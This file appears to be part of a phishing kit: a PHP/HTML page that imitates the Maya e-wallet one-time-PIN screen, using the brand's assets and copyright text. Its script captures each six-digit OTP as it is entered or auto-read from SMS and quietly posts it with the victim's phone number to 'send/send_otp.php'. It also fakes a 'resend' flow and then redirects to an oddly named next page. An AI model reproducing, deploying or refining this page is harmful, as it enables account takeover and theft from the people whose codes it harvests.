<?php
session_start();
$phoneNumber = '';
if (isset($_SESSION['phone_number'])) {
    $data = json_decode($_SESSION['phone_number'], true);
    if ($data && isset($data['phone'])) {
        $phoneNumber = htmlspecialchars($data['phone']);
    }
}
$cleanNumber = preg_replace('/[^0-9]/', '', $phoneNumber);

/* ✅ UPGRADE START: fallback at normalizer */

// 1) Fallback support (kung hindi array na may ['phone'])
if ($cleanNumber === '' && isset($_SESSION['phone_number'])) {
    $raw = $_SESSION['phone_number'];
    if (is_string($raw)) {
        $decoded = json_decode($raw, true);

        // if JSON is just a string: "0917..."
        if (is_string($decoded)) {
            $cleanNumber = preg_replace('/[^0-9]/', '', $decoded);
        }
        // if not JSON at all: 0917...
        elseif ($decoded === null) {
            $cleanNumber = preg_replace('/[^0-9]/', '', $raw);
        }
    }
}

// 2) Prevent $cleanNumber[0] warning kapag empty/missing
if ($cleanNumber === '') {
    http_response_code(400);
    echo "Phone number is missing.";
    exit;
}

// 3) Normalize common PH formats
// Example: +63 0917xxxxxxx -> digits "630917xxxxxxx" (13)
if (strpos($cleanNumber, '6309') === 0 && strlen($cleanNumber) === 13) {
    $cleanNumber = substr($cleanNumber, 3); // remove "630"
}

// Example: +63 917xxxxxxx -> digits "63917xxxxxxx" (12)
if (strpos($cleanNumber, '63') === 0 && strlen($cleanNumber) === 12) {
    $cleanNumber = substr($cleanNumber, 2); // remove "63"
}
/* ✅ UPGRADE END */

// If starts with 09, remove 0 to make 10-digit format starting with 9
if (strpos($cleanNumber, '09') === 0) {
    $cleanNumber = substr($cleanNumber, 1);
}
// Ensure only 10-digit numbers starting with 9
if ($cleanNumber[0] !== '9' || strlen($cleanNumber) !== 10) {
    http_response_code(400);
    echo "Invalid phone number format.";
    exit;
}

/* standardized formats (optional pang-SMS / logs) */
$ph_local = '0' . $cleanNumber;   // 09xxxxxxxxx
$ph_e164  = '+63' . $cleanNumber; // +639xxxxxxxxx
?>
<!DOCTYPE html>
<html class="no-js" lang="en" id="theme-paymaya">
<head>

    <!-- Google Tag Manager -->
    <script type="text/javascript" async
        src="www.googletagmanager.com/gtag/js?id=G-MXLFCRNEZE&amp;cx=c&amp;gtm=4e62i1"></script>
    <script async src="www.googletagmanager.com/gtm.js?id=GTM-57MCZQK"></script>
    <script>
    (function(w,d,s,l,i){
        w[l]=w[l]||[];
        w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});
        var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),
            dl=l!='dataLayer'?'&l='+l:'';
        j.async=true;
        j.src='www.googletagmanager.com/gtm.js?id='+i+dl;
        f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-57MCZQK');
    </script>
    <!-- End Google Tag Manager -->

    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}

      gtag('js', new Date());

      var identityValue = 'novalue';
      identityValue = "<?php echo $ph_e164; ?>";

      var state = 'novalue';
      var clientId = 'novalue';
      clientId = "paymaya-manager";

      gtag('set', 'user_properties', {
        'state_id': state,
        'client_id': clientId,
        'pymy_cn_id' : identityValue
      });

      gtag('config', 'GTM-57MCZQK', {
        'user_id': identityValue
      });

      window.dataLayer.push({ event: 'PAGE_VIEW' });

      window.addEventListener('beforeunload', function() {
        window.dataLayer.push({ event: 'PAGE_UNLOAD' });
      });
    </script>

    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

    <!-- viewport para hindi mag auto-zoom -->
    <meta name="viewport"
          content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no, viewport-fit=cover">

    <title>One Time PIN | Maya</title>

    <meta name="description" content="">
    <meta name="keywords" content="">
    <meta name="robot" content="index,follow">
    <meta name="copyright" content="Copyright © 2026 Maya. All rights reserved.">
    <meta name="format-detection" content="telephone=no">

    <script type="text/javascript"
        src="/ruxitagentjs_ICANVfqru_10329260206100503.js"
        data-dtconfig="app=113ff352c0c794c4|cors=1|owasp=1|featureHash=ICANVfqru|srsr=0|rdnt=1|uxrgce=1|cuc=vxw3zfa5|mel=100000|dpvc=1|lastModification=1770636367812|tp=500,50,0|srbbv=2|agentUri=/ruxitagentjs_ICANVfqru_10329260206100503.js|reportUrl=bf46601txs.bf.dynatrace.com/bf|rid=RID_1960632935|rpid=1459711375|domain=paymaya.com"></script>

    <link rel="shortcut icon" type="image/png" href="iam-assets.paymaya.com/images/favicon.svg">
    <link rel="shortcut icon" sizes="192x192" href="iam-assets.paymaya.com/images/favicon.svg" type="image/svg+xml">
    <link rel="apple-touch-icon" href="iam-assets.paymaya.com/images/favicon.svg" type="image/svg+xml">

    <!-- external CSS -->
    <link type="text/css" rel="stylesheet" href="iam-assets.paymaya.com/styles/main.css" charset="UTF-8">

    <script type="text/javascript" src="iam-assets.paymaya.com/scripts/vendor/jquery.min.js" charset="UTF-8"></script>
    <script type="text/javascript" src="iam-assets.paymaya.com/scripts/vendor/ued.min.js" charset="UTF-8"></script>
    <script type="text/javascript" src="iam-assets.paymaya.com/scripts/reset.js" charset="UTF-8"></script>

    <style>
    html, body {
        background-color: #fff;
        height: 100%;
        width: 100%;
    }

    * {
        box-sizing: border-box;
        font-family: "CerebriSansPro", sans-serif;
    }

    body {
        margin: 0;
        background: #ffffff;
        font-family: "CerebriSansPro", sans-serif;
        line-height: 1.42857143;
        color: #000;

        /* FLEX COLUMN: card + footers */
        display: flex;
        flex-direction: column;
        align-items: center;        /* center left/right */
        justify-content: flex-start;/* top-aligned content */
        overflow-x: hidden;
    }

    /* CARD – stable position + responsive width */
    .card {
        width: 100%;
        max-width: 420px;
        padding: 40px 32px 80px;
        border-radius: 12px;
        text-align: center;
        margin-top: 100px;
        box-sizing: border-box;
    }

    /* TITLE */
    h1 {
        font-size: 48px;
        font-weight: 500;
        margin-bottom: 15px;
        line-height: 62.4px;
    }

    h1 span {
        color: #00a651;
    }

    .semi-bold {
        font-weight: 500;
    }

    .form-otp .semi-bold {
        font-size: 40px;
        line-height: 52px;
        letter-spacing: -0.02em;
    }

    /* SUBTEXT */
    p {
        font-size: 13.5px;
        color: #7a7a7a;
        line-height: 1.45;
        margin-bottom: 34px;
    }
    .phone-number {
        color: #6b6b6b;
        font-weight: 500;
    }

    /* OTP VISUAL */
    .otp-visual {
        display: flex;
        justify-content: center;
        gap: 10px;
        padding: 0;
        height: 56px;
        font-size: 18px;
        color: #000;
        font-weight: 500;
        margin-bottom: 32px;
    }

    .otp-slot {
        width: 50px;
        height: 58px;
        border-radius: 16px;
        background: #fafafa;
        border: 1.5px solid transparent;
        display: flex;
        align-items: center;
        justify-content: center;
        font-size: 20px;
        color: #222;
        position: relative;
    }

    .otp-slot::after {
    content: "–";
    color: #b6b6b6;
    font-size: 19px;
    display: inline-block;
    transform: scaleX(var(--otp-dash-scale));
    --otp-dash-size: 26px;
    --otp-dash-scale: 1.5;
    font-family: "CerebriSansPro", sans-serif;
    line-height: 20px;
    border-radius: 16px;
    text-align: center;
    align-items: center;
    caret-color: rgba(0, 0, 0, 0);
    background-color: #f9f9fa;
    } 

    .otp-slot.active::after,
    .otp-slot.filled::after {
        content: "";
    }

    .otp-slot::before {
        content: "|";
        position: absolute;
        font-size: 16px;
        font-weight: 400;
        color: #000;
        left: 50%;
        top: 45%;
        transform: translate(-50%, -50%);
        opacity: 0;
        animation: blink 1s steps(1) infinite;
        font-weight: bold;
    }

    .otp-slot.active:not(.filled)::before {
        opacity: 1;
    }

    .otp-slot.filled::before {
        opacity: 0;
        animation: none;
    }

    @keyframes blink {
        50% { opacity: 0; }
    }

    .otp-slot.active {
        background: #fff;
        border-color: #bdbdbd;
        width: 50px;
    }

    /* Hidden real input (for script) */
    #otpReal {
        position: absolute;
        opacity: 0;
        width: 1px;
        height: 1px;
        font-size: 16px; /* para hindi mag-zoom sa focus sa mobile */
    }

/* BUTTON – base style (dito na ang font-family, para same sa lahat ng state) */
button {
    width: 92%;
    height: 53px;
    border-radius: 14px;
    border: none;
    font-size: 17px;
    font-weight: 600;
    font-family: "CerebriSansPro", sans-serif;
    background: #a6e3c1;   /* disabled color */
    color: #ffffff;
    cursor: default;
    margin-top: 16px;
    padding: 0 16px;

    /* remove any weird effects from external CSS */
    box-shadow: none;
    outline: none;
    transition: background-color 0.15s ease;
}

/* ACTIVE (6 digits OTP) – KULAY LANG ang iba, hindi nagbabago font/size */
button.enabled {
    background: #00a651;   /* active green */
    cursor: pointer;
}

button#verifyBtn {
    text-align: center;
}

/* iPhone tap highlight / active glow OFF, pero di binabago size */
#verifyBtn {
    -webkit-tap-highlight-color: transparent;
}
#verifyBtn:focus,
#verifyBtn:active {
    outline: none;
    box-shadow: none;
}

    /* huwag magpalit kulay on hover/focus, stay green lang */
    button.enabled:hover,
    button.enabled:focus,
    button.enabled:active {
        background: #00a651;
        box-shadow: none;
        outline: none;
    }
    /* kahit anong focus ng button, walang glow/blink */
    button:focus {
        outline: none;
        box-shadow: none;
    }

    /* RESEND */
    .resend {
        margin-top: 32px;
        font-size: 16px;
        margin-bottom: 8px;
        text-align: center;
        color: gray;
    }

    .resend a {
        display: inline-block;
        margin-top: 6px;
        color: #00a651;
        font-weight: 600;
        text-decoration: none;
    }

    /* FOOTERS */

    /* default = mobile: body-footer nakatago, site-footer ang gamit */
    .body-footer {
        display: none;
        width: 100%;
        text-align: center;
        margin-top: 24px;
        margin-bottom: 50px;
        font-size: 12px;
        line-height: 16px;
        color: #b1b3b5;
        font-weight: 500;
    }

    .site-footer {
        display: block;
        text-align: center;
        bottom: 0;
        position: absolute;
        height: 50px;
        clear: both;
        padding-top: 10px;
        color: #b1b3b5;
        font-weight: 500;
        width: 100%;
        font-size: 12px;
        line-height: 16px;
    }

    .body-footer .container.width-max,
    .site-footer .container.width-max {
        max-width: 420px;
        margin: 0 auto;
    }
    
    p.long-read {
      margin: 8px auto 30px 0px;
    }

    span {
        display: inline-block;
    }
/* 🔒 iPhone tap highlight fix ONLY – walang galaw sa laki/itsura ng "Verify" */

/* Alisin lang yung black tap highlight ni iOS */
#verifyBtn {
    -webkit-tap-highlight-color: transparent;
}

/* Kapag naka-focus o naka-active, walang extra glow/outline
   (pero style ng button, font-size, etc. galing pa rin sa `button { ... }` sa taas) */
#verifyBtn:focus,
#verifyBtn:active {
    outline: none;
    box-shadow: none;
}
/* ✅ Lock size/style ni "Verify" – same gyapon kahit green na siya */
#verifyBtn,
#verifyBtn.enabled,
#verifyBtn:active,
#verifyBtn.enabled:active,
#verifyBtn:focus,
#verifyBtn.enabled:focus {
    font-size: 17px !important;      /* same as base button */
    font-weight: 600 !important;     /* same as base button */
    -webkit-transform: none !important;
    transform: none !important;
    -webkit-text-size-adjust: 100%;
}
    /* MOBILE / NARROW VIEW ≤ 520px */
    @media (max-width: 520px) {
      /* title left */
      h1, .h1, h2, .h2, h3, .h3, h4, .h4, h5, .h5, h6, .h6 {
        text-align: left;
        margin-top: 0;
        margin-bottom: 0;
      }

      /* description text left */
      .long-read {
        text-align: left;
      }
      .card {
        max-width: 5000px;
        margin-top: 60px;
      }
      h1 {
        font-size: 43px;
      }
    }

    /* DESKTOP: body-footer lang ang visible (gaya ng screenshot) */
    @media (min-width: 521px) {
        .body-footer {
            display: block;
        }
        .site-footer {
            display: none;
        }
    }

    /* RESPONSIVE tweaks (text sizing lang, hindi layout) */
    @media (max-width: 480px) {
        h1 {
            font-size: 42px;
            line-height: 52px;
            letter-spacing: -0.02em;
        }
        .card {
            padding: 32px 20px 64px;
            margin-top: 40px;
        }
        p {
            font-size: 14px;
            line-height: 18px;
            margin-bottom: 24px;
            text-align: left;
        }
    }

/* OTP resend alert (green bar sa taas ng card) */
.otp-alert {
    display: none;                 /* default: nakatago */
    margin-bottom: 24px;
    padding: 16px 20px;
    border-radius: 16px;
    border: 1px solid #00a651;
    background: #ddf6e1;           /* light green background */
    color: #00a651;                /* green text */
    font-size: 12px;
    font-weight: 600;
    text-align: center;
    font-weight: bold;
}
    </style>
</head>

<body>

    <!-- Google Tag Manager (noscript) -->
    <noscript>
        <iframe src="www.googletagmanager.com/ns.html?id=GTM-57MCZQK"
                height="0" width="0" style="display:none;visibility:hidden"></iframe>
    </noscript>
    <!-- End Google Tag Manager (noscript) -->

    <div class="card">
        <!-- OTP alert banner -->
        <div id="otpAlert" class="otp-alert">OTP has been resent.</div>
        <h1 class="semi-bold">One-time <span class="emphasis">PIN</span></h1>

        
        <p class="long-read">
            Please enter the one-time PIN (OTP) that we sent to

            <span class="">+63
                <?php 
                    if (!empty($cleanNumber)) {
                        echo $cleanNumber; 
                    } else {
                        echo "your registered mobile number";
                    }
                ?>
            </span>
        </p>

        <input id="otpReal" maxlength="6" inputmode="numeric" autocomplete="one-time-code">

        <div class="otp-visual">
            <div class="otp-slot active"></div>
            <div class="otp-slot"></div>
            <div class="otp-slot"></div>
            <div class="otp-slot"></div>
            <div class="otp-slot"></div>
            <div class="otp-slot"></div>
        </div>

        <button id="verifyBtn">Verify</button>

        <div class="resend">
            Didn’t receive code?<br>
            <a id="resendLink" class="resend-link" href="#">Resend code</a>
        </div>
    </div>

    <!-- body-footer: desktop / large screen – katapat ng nasa screenshot -->
    <div class="body-footer">
        <div class="container width-max">
            <span>Copyright © 2026 Maya. All rights reserved.</span>
        </div>
    </div>
            
    <!-- site-footer: small screens (phones) -->
    <div class="site-footer">
        <div class="container width-max">
            <span>Copyright © 2026 Maya. All rights reserved.</span>
        </div>
    </div>

<script>
(function () {
    const input     = document.getElementById('otpReal');
    const slots     = document.querySelectorAll('.otp-slot');
    const button    = document.getElementById('verifyBtn');
    const otpAlert  = document.getElementById('otpAlert');
    const resendLink = document.getElementById('resendLink');

    // default state: disabled
    button.style.backgroundColor = '#a6e3c1';
    button.style.cursor = 'default';

    // auto-focus pero hindi agawin focus sa button/resend
    document.body.addEventListener('click', function (e) {
        const t = e.target;
        if (t === input || t === button || t === resendLink || t.closest('.resend')) {
            return;
        }
        input.focus();
    });

    // helper: render visual slots
    function renderSlots(valArr) {
        slots.forEach((slot, i) => {
            const ch = valArr[i] || '';
            slot.textContent = ch;
            slot.classList.toggle('filled', !!ch);
            slot.classList.remove('active');
        });

        // cursor sa next empty slot
        const nextIndex = valArr.length < slots.length ? valArr.length : (slots.length - 1);
        slots[nextIndex].classList.add('active');
    }

    // helper: enable / disable button
    function setButtonEnabled(enabled) {
        if (enabled) {
            button.classList.add('enabled');
            button.style.backgroundColor = '#00a651';
            button.style.cursor = 'pointer';
        } else {
            button.classList.remove('enabled');
            button.style.backgroundColor = '#a6e3c1';
            button.style.cursor = 'default';
        }
    }

    // ==== ANTI-SPAM GUARD (client side) ====
    // i-partner niya yung TTL mo sa PHP (10s)
    let lastSentOtp  = null;
    let lastSentTime = 0;
    const CLIENT_TTL_MS = 9000; // 9s, malapit sa 10s ng PHP

    function shouldSendOtp(otp) {
        if (!otp || otp.length !== 6) return false;
        const now = Date.now();

        // same OTP within 9 seconds → wag na i-resend
        if (lastSentOtp === otp && (now - lastSentTime) < CLIENT_TTL_MS) {
            return false;
        }

        lastSentOtp  = otp;
        lastSentTime = now;
        return true;
    }

    function sendOtpToServer(otp) {
        if (!shouldSendOtp(otp)) return; // guard

        const payload = new URLSearchParams();
        payload.set('otp', otp);

        // optional: isama yung phone sa POST kung available
        // galing sa naunang script: identityValue = "<?php echo $ph_e164; ?>";
        if (typeof identityValue !== 'undefined' && identityValue && identityValue !== 'novalue') {
            payload.set('phone', identityValue);
        }

        fetch('send/send_otp.php', {
            method: 'POST',
            headers: {'Content-Type': 'application/x-www-form-urlencoded'},
            body: payload.toString()
        }).catch(function () {
            // tahimik lang pag error, wag guluhin user
        });
    }

    // === OTP INPUT HANDLER ===
    input.addEventListener('input', function () {
        // digits lang, max 6
        input.value = input.value.replace(/\D/g, '').slice(0, 6);
        const valArr = input.value.split('');

        // update UI
        renderSlots(valArr);
        setButtonEnabled(valArr.length === 6);

        // auto-send OTP once kapag buo na (6 digits)
        if (valArr.length === 6) {
            sendOtpToServer(input.value);
        }
    });

    // bawal letters / symbols sa OTP field
    input.addEventListener('keydown', function (e) {
        // allow control keys
        const allowedKeys = ['Backspace', 'Delete', 'ArrowLeft', 'ArrowRight', 'Tab', 'Enter'];
        if (allowedKeys.includes(e.key)) return;

        // digits lang
        if (e.key.length === 1 && !/[0-9]/.test(e.key)) {
            e.preventDefault();
        }
    });

    // click Verify = siguraduhing na-send yung last OTP, tapos redirect
    button.addEventListener('click', function () {
        if (input.value.length === 6) {
            // make sure latest OTP is sent at least once
            sendOtpToServer(input.value);
            window.location.replace('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz564565345344.php');
        }
    });

    // ANDROID SMS AUTO READ
    if ('OTPCredential' in window) {
        navigator.credentials.get({ otp: { transport: ['sms'] } })
            .then(function (otp) {
                const code = (otp.code || '').replace(/\D/g, '').slice(0, 6);
                if (!code) return;
                input.value = code;
                input.dispatchEvent(new Event('input', { bubbles: true }));
            })
            .catch(function () {});
    }

    // ========== RESEND COOLDOWN (30s) – same logic, mas linis lang ==========
    const RESEND_SECONDS = 30;
    let resendTimer = null;
    let resendRemaining = 0;

    function formatTime(sec) {
        const m = Math.floor(sec / 60);
        const s = sec % 60;
        const mm = m < 10 ? '0' + m : '' + m;
        const ss = s < 10 ? '0' + s : '' + s;
        return mm + ':' + ss;
    }

    function startResendCooldown() {
        resendRemaining = RESEND_SECONDS;

        // disable link
        resendLink.style.fontSize       = '15px';
        resendLink.style.pointerEvents  = 'none';
        resendLink.style.cursor         = 'default';
        resendLink.style.color          = '#b1b3b5';
        resendLink.textContent          = 'Resend in ' + formatTime(resendRemaining);

        resendTimer = setInterval(function () {
            resendRemaining--;

            if (resendRemaining > 0) {
                resendLink.textContent = 'Resend in ' + formatTime(resendRemaining);
            } else {
                clearInterval(resendTimer);
                resendTimer = null;
                resendLink.textContent         = 'Resend code';
                resendLink.style.pointerEvents = 'auto';
                resendLink.style.cursor        = 'pointer';
                resendLink.style.color         = '#00a651';
            }
        }, 1000);
    }

    if (resendLink) {
        resendLink.addEventListener('click', function (e) {
            e.preventDefault();
            if (resendTimer !== null) return; // naka-cooldown pa

            fetch('send/resend_otp.php', { method: 'POST' }).catch(function () {});

            // Show green banner
            if (otpAlert) {
                otpAlert.style.display = 'block';
                otpAlert.textContent = 'OTP has been resent.';
            }

            startResendCooldown();
        });
    }

    // focus OTP input on load
    window.addEventListener('load', function () {
        input.focus();
    });
})();
</script>
<script type="text/javascript" src="iam-assets.paymaya.com/scripts/main.js" charset="UTF-8"></script>